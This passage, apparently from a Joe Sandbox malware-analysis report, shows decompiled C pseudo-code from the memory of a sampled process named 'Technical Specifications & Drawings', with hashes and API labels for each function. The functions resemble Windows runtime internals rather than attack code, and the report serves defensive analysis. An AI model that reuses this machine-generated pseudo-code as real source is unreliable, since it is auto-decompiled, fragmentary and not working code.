                                                  											 *0x18979dc =  *0x18979dc + 1;
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L52;
                                                  					}
                                                  					if(E017C7D50() != 0) {
                                                  						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  					} else {
                                                  						_t83 = 0x7ffe0384;
                                                  					}
                                                  					if( *_t83 != 0) {
                                                  						_t84 =  *[fs:0x30];
                                                  						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                  						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                  							_t94 = E017C7D50();
                                                  							__eflags = _t94;
                                                  							if(_t94 == 0) {
                                                  								_t95 = 0x7ffe0385;
                                                  							} else {
                                                  								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                  							}
                                                  							__eflags =  *_t95 & 0x00000020;
                                                  							if(( *_t95 & 0x00000020) != 0) {
                                                  								E01827016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                  							}
                                                  						}
                                                  					}
                                                  					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                  						if( *0x1898708 != 0) {
                                                  							_t118 =  *0x7ffe0330;
                                                  							_t123 =  *0x1897b00; // 0x0
                                                  							asm("ror esi, cl");
                                                  							 *0x189b1e0(_v12, _v20, 0x20);
                                                  							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                  							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                  							asm("sbb esi, esi");
                                                  							_t120 =  ~_t50 & _t93;
                                                  						} else {
                                                  							_t120 = 0;
                                                  						}
                                                  					}
                                                  					if( !_t120 >= 0) {
                                                  						L19:
                                                  						_push( *_t105);
                                                  						E017E95D0();
                                                  						 *_t105 =  *_t105 & 0x00000000;
                                                  						goto L20;
                                                  					}
                                                  					_t120 = E017B7F65(_t119);
                                                  					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                  						__eflags = _t120;
                                                  						if(_t120 < 0) {
                                                  							goto L19;
                                                  						}
                                                  						 *(_t119 + 0x64) = _v12;
                                                  						goto L22;
                                                  					}
                                                  					goto L19;
                                                  				}
                                                  			}









































                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4d3cc09d67fbdac155841967b70981f47e2ffd6b94711880b74a1bf4083ffd2
                                                  • Instruction ID: f5f4bc0a2148ae608ad3d99465286e1b641111f713385dfde5122432dc9cd8bc
                                                  • Opcode Fuzzy Hash: c4d3cc09d67fbdac155841967b70981f47e2ffd6b94711880b74a1bf4083ffd2
                                                  • Instruction Fuzzy Hash: 9C910772E002199FEF229A6CC848FADBBB8AB05724F550265FA11E72D5D7749E40CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E017AB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                  				signed int _t65;
                                                  				signed short _t69;
                                                  				intOrPtr _t70;
                                                  				signed short _t85;
                                                  				void* _t86;
                                                  				signed short _t89;
                                                  				signed short _t91;
                                                  				intOrPtr _t92;
                                                  				intOrPtr _t97;
                                                  				intOrPtr* _t98;
                                                  				signed short _t99;
                                                  				signed short _t101;
                                                  				void* _t102;
                                                  				char* _t103;
                                                  				signed short _t104;
                                                  				intOrPtr* _t110;
                                                  				void* _t111;
                                                  				void* _t114;
                                                  				intOrPtr* _t115;
                                                  
                                                  				_t109 = __esi;
                                                  				_t108 = __edi;
                                                  				_t106 = __edx;
                                                  				_t95 = __ebx;
                                                  				_push(0x90);
                                                  				_push(0x187f7a8);
                                                  				E017FD0E8(__ebx, __edi, __esi);
                                                  				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                  				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                  				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                  				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                  				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                  				if(__edx == 0xffffffff) {
                                                  					L6:
                                                  					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                  					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                  					__eflags = _t65 & 0x00000002;
                                                  					if((_t65 & 0x00000002) != 0) {
                                                  						L3:
                                                  						L4:
                                                  						return E017FD130(_t95, _t108, _t109);
                                                  					}
                                                  					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                  					_t108 = 0;
                                                  					_t109 = 0;
                                                  					_t95 = 0;
                                                  					__eflags = 0;
                                                  					while(1) {
                                                  						__eflags = _t95 - 0x200;
                                                  						if(_t95 >= 0x200) {
                                                  							break;
                                                  						}
                                                  						E017ED000(0x80);
                                                  						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                  						_t108 = _t115;
                                                  						_t95 = _t95 - 0xffffff80;
                                                  						_t17 = _t114 - 4;
                                                  						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                  						__eflags =  *_t17;
                                                  						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                  						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                  						_t102 = _t110 + 1;
                                                  						do {
                                                  							_t85 =  *_t110;
                                                  							_t110 = _t110 + 1;
                                                  							__eflags = _t85;
                                                  						} while (_t85 != 0);
                                                  						_t111 = _t110 - _t102;
                                                  						_t21 = _t95 - 1; // -129
                                                  						_t86 = _t21;
                                                  						__eflags = _t111 - _t86;
                                                  						if(_t111 > _t86) {
                                                  							_t111 = _t86;
                                                  						}
                                                  						E017EF3E0(_t108, _t106, _t111);
                                                  						_t115 = _t115 + 0xc;
                                                  						_t103 = _t111 + _t108;
                                                  						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                  						_t89 = _t95 - _t111;
                                                  						__eflags = _t89;
                                                  						_push(0);
                                                  						if(_t89 == 0) {
                                                  							L15:
                                                  							_t109 = 0xc000000d;
                                                  							goto L16;
                                                  						} else {
                                                  							__eflags = _t89 - 0x7fffffff;
                                                  							if(_t89 <= 0x7fffffff) {
                                                  								L16:
                                                  								 *(_t114 - 0x94) = _t109;
                                                  								__eflags = _t109;
                                                  								if(_t109 < 0) {
                                                  									__eflags = _t89;
                                                  									if(_t89 != 0) {
                                                  										 *_t103 = 0;
                                                  									}
                                                  									L26:
                                                  									 *(_t114 - 0xa0) = _t109;
                                                  									 *(_t114 - 4) = 0xfffffffe;
                                                  									__eflags = _t109;
                                                  									if(_t109 >= 0) {
                                                  										L31:
                                                  										_t98 = _t108;
                                                  										_t39 = _t98 + 1; // 0x1
                                                  										_t106 = _t39;
                                                  										do {
                                                  											_t69 =  *_t98;
                                                  											_t98 = _t98 + 1;
                                                  											__eflags = _t69;
                                                  										} while (_t69 != 0);
                                                  										_t99 = _t98 - _t106;
                                                  										__eflags = _t99;
                                                  										L34:
                                                  										_t70 =  *[fs:0x30];
                                                  										__eflags =  *((char*)(_t70 + 2));
                                                  										if( *((char*)(_t70 + 2)) != 0) {
                                                  											L40:
                                                  											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                  											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                  											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                  											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                  											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                  											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                  											 *(_t114 - 4) = 1;
                                                  											_push(_t114 - 0x74);
                                                  											E017FDEF0(_t99, _t106);
                                                  											 *(_t114 - 4) = 0xfffffffe;
                                                  											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                  											goto L3;
                                                  										}
                                                  										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                  										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                  											goto L40;
                                                  										}
                                                  										_push( *((intOrPtr*)(_t114 + 8)));
                                                  										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                  										_push(_t99 & 0x0000ffff);
                                                  										_push(_t108);
                                                  										_push(1);
                                                  										_t101 = E017EB280();
                                                  										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                  										if( *((char*)(_t114 + 0x14)) == 1) {
                                                  											__eflags = _t101 - 0x80000003;
                                                  											if(_t101 == 0x80000003) {
                                                  												E017EB7E0(1);
                                                  												_t101 = 0;
                                                  												__eflags = 0;
                                                  											}
                                                  										}
                                                  										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                  										goto L4;
                                                  									}
                                                  									__eflags = _t109 - 0x80000005;
                                                  									if(_t109 == 0x80000005) {
                                                  										continue;
                                                  									}
                                                  									break;
                                                  								}
                                                  								 *(_t114 - 0x90) = 0;
                                                  								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                  								_t91 = E017EE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                  								_t115 = _t115 + 0x10;
                                                  								_t104 = _t91;
                                                  								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                  								__eflags = _t104;
                                                  								if(_t104 < 0) {
                                                  									L21:
                                                  									_t109 = 0x80000005;
                                                  									 *(_t114 - 0x90) = 0x80000005;
                                                  									L22:
                                                  									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                  									L23:
                                                  									 *(_t114 - 0x94) = _t109;
                                                  									goto L26;
                                                  								}
                                                  								__eflags = _t104 - _t92;
                                                  								if(__eflags > 0) {
                                                  									goto L21;
                                                  								}
                                                  								if(__eflags == 0) {
                                                  									goto L22;
                                                  								}
                                                  								goto L23;
                                                  							}
                                                  							goto L15;
                                                  						}
                                                  					}
                                                  					__eflags = _t109;
                                                  					if(_t109 >= 0) {
                                                  						goto L31;
                                                  					}
                                                  					__eflags = _t109 - 0x80000005;
                                                  					if(_t109 != 0x80000005) {
                                                  						goto L31;
                                                  					}
                                                  					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                  					_t38 = _t95 - 1; // -129
                                                  					_t99 = _t38;
                                                  					goto L34;
                                                  				}
                                                  				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                  					__eflags = __edx - 0x65;
                                                  					if(__edx != 0x65) {
                                                  						goto L2;
                                                  					}
                                                  					goto L6;
                                                  				}
                                                  				L2:
                                                  				_push( *((intOrPtr*)(_t114 + 8)));
                                                  				_push(_t106);
                                                  				if(E017EA890() != 0) {
                                                  					goto L6;
                                                  				}
                                                  				goto L3;
                                                  			}


                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: _vswprintf_s
                                                  • String ID:
                                                  • API String ID: 677850445-0
                                                  • Opcode ID: f27e82c02bdc3bcf5fd60394ea5e801b244b7820b76fa0fc1382c4be13824df2
                                                  • Instruction ID: 25060e9ac64df629ebf20698cc18166f1deed9572cf93f5f950a90f14740818d
                                                  • Opcode Fuzzy Hash: f27e82c02bdc3bcf5fd60394ea5e801b244b7820b76fa0fc1382c4be13824df2
                                                  • Instruction Fuzzy Hash: 5451D071D4025E8EEB72CF68C848BAEBBF0AF04710F1041ADDA59EB292D7704A41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 76%
                                                  			E017CB944(signed int* __ecx, char __edx) {
                                                  				signed int _v8;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				char _v28;
                                                  				signed int _v32;
                                                  				char _v36;
                                                  				signed int _v40;
                                                  				intOrPtr _v44;
                                                  				signed int* _v48;
                                                  				signed int _v52;
                                                  				signed int _v56;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				intOrPtr _v72;
                                                  				intOrPtr _v76;
                                                  				char _v77;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t65;
                                                  				intOrPtr _t67;
                                                  				intOrPtr _t68;
                                                  				char* _t73;
                                                  				intOrPtr _t77;
                                                  				intOrPtr _t78;
                                                  				signed int _t82;
                                                  				intOrPtr _t83;
                                                  				void* _t87;
                                                  				char _t88;
                                                  				intOrPtr* _t89;
                                                  				intOrPtr _t91;
                                                  				void* _t97;
                                                  				intOrPtr _t100;
                                                  				void* _t102;
                                                  				void* _t107;
                                                  				signed int _t108;
                                                  				intOrPtr* _t112;
                                                  				void* _t113;
                                                  				intOrPtr* _t114;
                                                  				intOrPtr _t115;
                                                  				intOrPtr _t116;
                                                  				intOrPtr _t117;
                                                  				signed int _t118;
                                                  				void* _t130;
                                                  
                                                  				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                  				_v8 =  *0x189d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                  				_t112 = __ecx;
                                                  				_v77 = __edx;
                                                  				_v48 = __ecx;
                                                  				_v28 = 0;
                                                  				_t5 = _t112 + 0xc; // 0x575651ff
                                                  				_t105 =  *_t5;
                                                  				_v20 = 0;
                                                  				_v16 = 0;
                                                  				if(_t105 == 0) {
                                                  					_t50 = _t112 + 4; // 0x5de58b5b
                                                  					_t60 =  *__ecx |  *_t50;
                                                  					if(( *__ecx |  *_t50) != 0) {
                                                  						 *__ecx = 0;
                                                  						__ecx[1] = 0;
                                                  						if(E017C7D50() != 0) {
                                                  							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  						} else {
                                                  							_t65 = 0x7ffe0386;
                                                  						}
                                                  						if( *_t65 != 0) {
                                                  							E01878CD6(_t112);
                                                  						}
                                                  						_push(0);
                                                  						_t52 = _t112 + 0x10; // 0x778df98b
                                                  						_push( *_t52);
                                                  						_t60 = E017E9E20();
                                                  					}
                                                  					L20:
                                                  					_pop(_t107);
                                                  					_pop(_t113);
                                                  					_pop(_t87);
                                                  					return E017EB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                  				}
                                                  				_t8 = _t112 + 8; // 0x8b000cc2
                                                  				_t67 =  *_t8;
                                                  				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                  				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                  				_t108 =  *(_t67 + 0x14);
                                                  				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                  				_t105 = 0x2710;
                                                  				asm("sbb eax, edi");
                                                  				_v44 = _t88;
                                                  				_v52 = _t108;
                                                  				_t60 = E017ECE00(_t97, _t68, 0x2710, 0);
                                                  				_v56 = _t60;
                                                  				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                  					L3:
                                                  					 *(_t112 + 0x44) = _t60;
                                                  					_t105 = _t60 * 0x2710 >> 0x20;
                                                  					 *_t112 = _t88;
                                                  					 *(_t112 + 4) = _t108;
                                                  					_v20 = _t60 * 0x2710;
                                                  					_v16 = _t60 * 0x2710 >> 0x20;
                                                  					if(_v77 != 0) {
                                                  						L16:
                                                  						_v36 = _t88;
                                                  						_v32 = _t108;
                                                  						if(E017C7D50() != 0) {
                                                  							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  						} else {
                                                  							_t73 = 0x7ffe0386;
                                                  						}
                                                  						if( *_t73 != 0) {
                                                  							_t105 = _v40;
                                                  							E01878F6A(_t112, _v40, _t88, _t108);
                                                  						}
                                                  						_push( &_v28);
                                                  						_push(0);
                                                  						_push( &_v36);
                                                  						_t48 = _t112 + 0x10; // 0x778df98b
                                                  						_push( *_t48);
                                                  						_t60 = E017EAF60();
                                                  						goto L20;
                                                  					} else {
                                                  						_t89 = 0x7ffe03b0;
                                                  						do {
                                                  							_t114 = 0x7ffe0010;
                                                  							do {
                                                  								_t77 =  *0x1898628; // 0x0
                                                  								_v68 = _t77;
                                                  								_t78 =  *0x189862c; // 0x0
                                                  								_v64 = _t78;
                                                  								_v72 =  *_t89;
                                                  								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                  								while(1) {
                                                  									_t105 =  *0x7ffe000c;
                                                  									_t100 =  *0x7ffe0008;
                                                  									if(_t105 ==  *_t114) {
                                                  										goto L8;
                                                  									}
                                                  									asm("pause");
                                                  								}
                                                  								L8:
                                                  								_t89 = 0x7ffe03b0;
                                                  								_t115 =  *0x7ffe03b0;
                                                  								_t82 =  *0x7FFE03B4;
                                                  								_v60 = _t115;
                                                  								_t114 = 0x7ffe0010;
                                                  								_v56 = _t82;
                                                  							} while (_v72 != _t115 || _v76 != _t82);
                                                  							_t83 =  *0x1898628; // 0x0
                                                  							_t116 =  *0x189862c; // 0x0
                                                  							_v76 = _t116;
                                                  							_t117 = _v68;
                                                  						} while (_t117 != _t83 || _v64 != _v76);
                                                  						asm("sbb edx, [esp+0x24]");
                                                  						_t102 = _t100 - _v60 - _t117;
                                                  						_t112 = _v48;
                                                  						_t91 = _v44;
                                                  						asm("sbb edx, eax");
                                                  						_t130 = _t105 - _v52;
                                                  						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                  							_t88 = _t102 - _t91;
                                                  							asm("sbb edx, edi");
                                                  							_t108 = _t105;
                                                  						} else {
                                                  							_t88 = 0;
                                                  							_t108 = 0;
                                                  						}
                                                  						goto L16;
                                                  					}
                                                  				} else {
                                                  					if( *(_t112 + 0x44) == _t60) {
                                                  						goto L20;
                                                  					}
                                                  					goto L3;
                                                  				}
                                                  			}

                                                  0x017cba7a
                                                  0x017cba7c
                                                  0x017cba8e
                                                  0x017cba90
                                                  0x017cba92
                                                  0x017cbb14
                                                  0x017cbb14
                                                  0x017cbb16
                                                  0x017cbb16
                                                  0x00000000
                                                  0x017cba7c
                                                  0x017cbb0a
                                                  0x017cbb0d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017cbb0f

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017CB9A5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 885266447-0
                                                  • Opcode ID: a8cc7a87a7da6665aefb977c76f8b25b193d55d765c508b7677e1af7d78c4fe2
                                                  • Instruction ID: 82276dbc8678de53a6751d2a5ac1d66376faf43d2dbcdd838b4dcdf83728a3cd
                                                  • Opcode Fuzzy Hash: a8cc7a87a7da6665aefb977c76f8b25b193d55d765c508b7677e1af7d78c4fe2
                                                  • Instruction Fuzzy Hash: 42514671A08341CFC721CF6DC48592AFBE5BB89B80F14896EFA8587359D731E944CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 70%
                                                  			E01853D40(intOrPtr __ecx, char* __edx) {
                                                  				signed int _v8;
                                                  				char* _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				char _v28;
                                                  				char _v29;
                                                  				intOrPtr* _v32;
                                                  				char _v36;
                                                  				char _v37;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				char* _t34;
                                                  				intOrPtr* _t37;
                                                  				intOrPtr* _t42;
                                                  				intOrPtr* _t47;
                                                  				intOrPtr* _t48;
                                                  				intOrPtr* _t49;
                                                  				char _t51;
                                                  				void* _t52;
                                                  				intOrPtr* _t53;
                                                  				char* _t55;
                                                  				char _t59;
                                                  				char* _t61;
                                                  				intOrPtr* _t64;
                                                  				void* _t65;
                                                  				char* _t67;
                                                  				void* _t68;
                                                  				signed int _t70;
                                                  
                                                  				_t62 = __edx;
                                                  				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                                                  				_v8 =  *0x189d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                                                  				_t34 =  &_v28;
                                                  				_v20 = __ecx;
                                                  				_t67 = __edx;
                                                  				_v24 = _t34;
                                                  				_t51 = 0;
                                                  				_v12 = __edx;
                                                  				_v29 = 0;
                                                  				_v28 = _t34;
                                                  				E017C2280(_t34, 0x1898a6c);
                                                  				_t64 =  *0x1895768; // 0x77575768
                                                  				if(_t64 != 0x1895768) {
                                                  					while(1) {
                                                  						_t8 = _t64 + 8; // 0x77575770
                                                  						_t42 = _t8;
                                                  						_t53 = _t64;
                                                  						 *_t42 =  *_t42 + 1;
                                                  						_v16 = _t42;
                                                  						E017BFFB0(_t53, _t64, 0x1898a6c);
                                                  						 *0x189b1e0(_v24, _t67);
                                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                                                  							_v37 = 1;
                                                  						}
                                                  						E017C2280(_t45, 0x1898a6c);
                                                  						_t47 = _v28;
                                                  						_t64 =  *_t64;
                                                  						 *_t47 =  *_t47 - 1;
                                                  						if( *_t47 != 0) {
                                                  							goto L8;
                                                  						}
                                                  						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                                                  							L10:
                                                  							_push(3);
                                                  							asm("int 0x29");
                                                  						} else {
                                                  							_t48 =  *((intOrPtr*)(_t53 + 4));
                                                  							if( *_t48 != _t53) {
                                                  								goto L10;
                                                  							} else {
                                                  								 *_t48 = _t64;
                                                  								_t61 =  &_v36;
                                                  								 *((intOrPtr*)(_t64 + 4)) = _t48;
                                                  								_t49 = _v32;
                                                  								if( *_t49 != _t61) {
                                                  									goto L10;
                                                  								} else {
                                                  									 *_t53 = _t61;
                                                  									 *((intOrPtr*)(_t53 + 4)) = _t49;
                                                  									 *_t49 = _t53;
                                                  									_v32 = _t53;
                                                  									goto L8;
                                                  								}
                                                  							}
                                                  						}
                                                  						L11:
                                                  						_t51 = _v29;
                                                  						goto L12;
                                                  						L8:
                                                  						if(_t64 != 0x1895768) {
                                                  							_t67 = _v20;
                                                  							continue;
                                                  						}
                                                  						goto L11;
                                                  					}
                                                  				}
                                                  				L12:
                                                  				E017BFFB0(_t51, _t64, 0x1898a6c);
                                                  				while(1) {
                                                  					_t37 = _v28;
                                                  					_t55 =  &_v28;
                                                  					if(_t37 == _t55) {
                                                  						break;
                                                  					}
                                                  					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                                                  						goto L10;
                                                  					} else {
                                                  						_t59 =  *_t37;
                                                  						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                                                  							goto L10;
                                                  						} else {
                                                  							_t62 =  &_v28;
                                                  							_v28 = _t59;
                                                  							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                                                  							continue;
                                                  						}
                                                  					}
                                                  					L18:
                                                  				}
                                                  				_pop(_t65);
                                                  				_pop(_t68);
                                                  				_pop(_t52);
                                                  				return E017EB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                                                  				goto L18;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 98dfa5516a86d40a291aa75255176b22bd55a12ea3c945577152203203363c57
                                                  • Instruction ID: 3126015a77a7bb3d8b888af54a9400f3502a7f696820e25c1945ea9bc13cf43d
                                                  • Opcode Fuzzy Hash: 98dfa5516a86d40a291aa75255176b22bd55a12ea3c945577152203203363c57
                                                  • Instruction Fuzzy Hash: 833197B1609302DFCB11DF18C98491ABBE1FF86744F08496EF888DB645D734EA04CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E017E4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				signed int _v8;
                                                  				signed int* _v12;
                                                  				char _v13;
                                                  				signed int _v16;
                                                  				char _v21;
                                                  				signed int* _v24;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t29;
                                                  				signed int* _t32;
                                                  				signed int* _t41;
                                                  				signed int _t42;
                                                  				void* _t43;
                                                  				intOrPtr* _t51;
                                                  				void* _t52;
                                                  				signed int _t53;
                                                  				signed int _t58;
                                                  				void* _t59;
                                                  				signed int _t60;
                                                  				signed int _t62;
                                                  
                                                  				_t49 = __edx;
                                                  				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                  				_t26 =  *0x189d360 ^ _t62;
                                                  				_v8 =  *0x189d360 ^ _t62;
                                                  				_t41 = __ecx;
                                                  				_t51 = __edx;
                                                  				_v12 = __ecx;
                                                  				if(_a4 == 0) {
                                                  					if(_a8 != 0) {
                                                  						goto L1;
                                                  					}
                                                  					_v13 = 1;
                                                  					E017C2280(_t26, 0x1898608);
                                                  					_t58 =  *_t41;
                                                  					if(_t58 == 0) {
                                                  						L11:
                                                  						E017BFFB0(_t41, _t51, 0x1898608);
                                                  						L2:
                                                  						 *0x189b1e0(_a4, _a8);
                                                  						_t42 =  *_t51();
                                                  						if(_t42 == 0) {
                                                  							_t29 = 0;
                                                  							L5:
                                                  							_pop(_t52);
                                                  							_pop(_t59);
                                                  							_pop(_t43);
                                                  							return E017EB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                  						}
                                                  						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                  						if(_v21 != 0) {
                                                  							_t53 = 0;
                                                  							E017C2280(_t28, 0x1898608);
                                                  							_t32 = _v24;
                                                  							if( *_t32 == _t58) {
                                                  								 *_t32 = _t42;
                                                  								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                  								if(_t58 != 0) {
                                                  									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                  									asm("sbb edi, edi");
                                                  									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                  								}
                                                  							}
                                                  							E017BFFB0(_t42, _t53, 0x1898608);
                                                  							if(_t53 != 0) {
                                                  								L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                  							}
                                                  						}
                                                  						_t29 = _t42;
                                                  						goto L5;
                                                  					}
                                                  					if( *((char*)(_t58 + 0x40)) != 0) {
                                                  						L10:
                                                  						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                  						E017BFFB0(_t41, _t51, 0x1898608);
                                                  						_t29 = _t58;
                                                  						goto L5;
                                                  					}
                                                  					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                  					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                  						goto L11;
                                                  					}
                                                  					goto L10;
                                                  				}
                                                  				L1:
                                                  				_v13 = 0;
                                                  				_t58 = 0;
                                                  				goto L2;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: bdf31a2ef1b7901a7b1f316acbe30a071434af6678447c68016fa979cdcecc37
